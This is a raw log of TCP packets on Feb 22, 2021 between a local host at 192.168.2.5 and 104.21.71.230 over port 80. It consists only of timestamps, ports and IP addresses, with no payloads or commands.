                                                                                                                                                                Feb 22, 2021 07:45:12.037352085 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:12.039884090 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.039906025 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.040024996 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:12.040380001 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.040410042 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.040446997 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:12.041462898 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.041481972 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.041532040 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:12.043757915 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.043778896 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.044084072 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:12.044261932 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.044281006 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.044341087 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:12.045296907 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.045316935 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.045406103 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:12.046716928 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.046736956 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.046833992 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:12.047394037 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.047414064 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.047467947 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:12.048455000 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.048480034 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.048564911 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:12.049603939 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.049681902 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:12.050328970 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.050347090 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.050426006 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:12.051021099 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.051038980 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.051152945 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:12.052747011 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.052764893 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.052819967 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:12.053778887 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.053797960 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.053858995 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:12.054627895 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.054646969 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.054722071 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:12.055598974 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.055618048 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.055701971 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:12.057713032 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.057735920 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.057802916 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:12.058842897 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.058862925 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.058928013 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:12.078260899 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.078283072 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.078376055 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:12.078553915 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.078584909 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.079711914 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.079730034 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.079746962 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:12.079808950 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:12.081095934 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.081116915 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.081279993 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:12.084079027 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.084100008 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.084216118 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:12.084418058 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.084436893 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.084536076 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:12.087258101 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.087275982 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.087358952 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:12.087599993 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.087634087 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.087698936 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:12.088613033 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.088634014 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.088711977 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:12.091264009 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.091289997 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.091407061 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:12.091578960 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.091595888 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.091670990 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:12.092586040 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.092607021 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.092664957 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:12.094026089 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.094047070 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.094120979 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:12.094656944 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.094677925 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.094729900 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:12.095731974 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.095766068 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.095864058 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:12.096807957 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.096827030 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.096908092 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:12.097615957 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.097635984 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.097706079 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:12.097950935 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.097969055 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.098467112 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:12.098654985 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.098674059 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.098742962 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:12.099339962 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.099359035 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.099426031 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:12.100037098 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.100056887 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.100146055 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:12.100723982 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.100748062 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.100831985 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:12.101419926 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.101438999 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.101500034 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:12.102108002 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.102127075 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.102210999 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:12.102803946 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.102823019 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.102900982 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:12.103488922 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.103507996 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.103631020 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:12.104161978 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.104181051 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.104249001 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:12.104846001 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.104863882 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.104924917 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:12.105567932 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.105586052 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.105638027 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:12.106231928 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.106251001 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.106322050 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:12.106973886 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.106991053 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.107038975 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:12.107613087 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.107631922 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.107718945 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:12.108333111 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.108352900 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.108409882 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:12.108985901 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.109004021 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.109090090 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:12.109736919 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.109757900 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.109834909 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:12.245260000 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.245280981 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.245299101 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.245374918 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:12.245601892 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.245620012 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.245640993 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.245656967 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:12.245683908 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:12.246397018 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.246418953 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.246434927 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.246506929 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:12.247164011 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.247183084 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.247196913 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.247246981 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:12.247279882 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:12.247939110 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.247957945 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.247971058 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.248040915 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:12.248708963 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.248728037 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.248740911 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.248789072 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:12.248831034 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:12.249474049 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.249497890 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.249516964 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.249627113 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:12.250287056 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.250307083 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.250324965 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.250969887 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:12.251049042 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.251070023 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.251087904 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.251161098 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:12.251808882 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.251827002 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.251847982 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.251967907 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:12.252023935 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:12.252558947 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.252578020 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.252594948 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.252645016 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:12.253339052 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.253359079 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.253376007 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.253412008 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:12.253448963 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:12.254108906 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.254129887 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.254148006 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.254199028 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:12.254887104 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.254905939 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.254923105 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.254959106 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:12.255011082 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:12.255664110 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.255685091 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.255701065 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.255749941 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:12.256422043 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.256439924 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.256457090 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.256484032 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:12.256517887 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:12.257183075 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.257201910 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.257217884 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.257276058 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:12.257966042 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.257986069 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.258002043 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.258029938 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:12.258069992 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:12.258734941 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.258754015 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.258771896 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.258817911 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:12.259536028 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.259558916 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.259578943 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.259613037 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:12.259646893 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:12.260277987 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.260298014 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.260313988 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.260365963 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:12.261050940 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.261070013 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.261086941 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.261126041 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:12.261154890 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:12.261816978 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.261836052 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.261852026 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.261899948 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:12.262578964 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.262602091 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.262643099 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.262655020 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:12.262696028 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:12.263366938 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.263386011 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.263402939 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.263463020 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:12.264148951 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.264168024 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.264188051 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.264240980 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:12.264295101 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:12.264909983 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.264929056 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.264945984 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.264991999 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:12.265686989 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.265711069 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.265729904 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.265755892 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:12.265793085 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:12.266463995 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.266484022 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.266500950 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.267158985 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:12.267231941 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.267249107 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.267266035 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.267290115 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:12.267343998 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:12.268009901 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.268030882 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.268049955 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.268099070 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:12.268793106 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.268814087 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.268836021 CET8049715104.21.71.230192.168.2.5
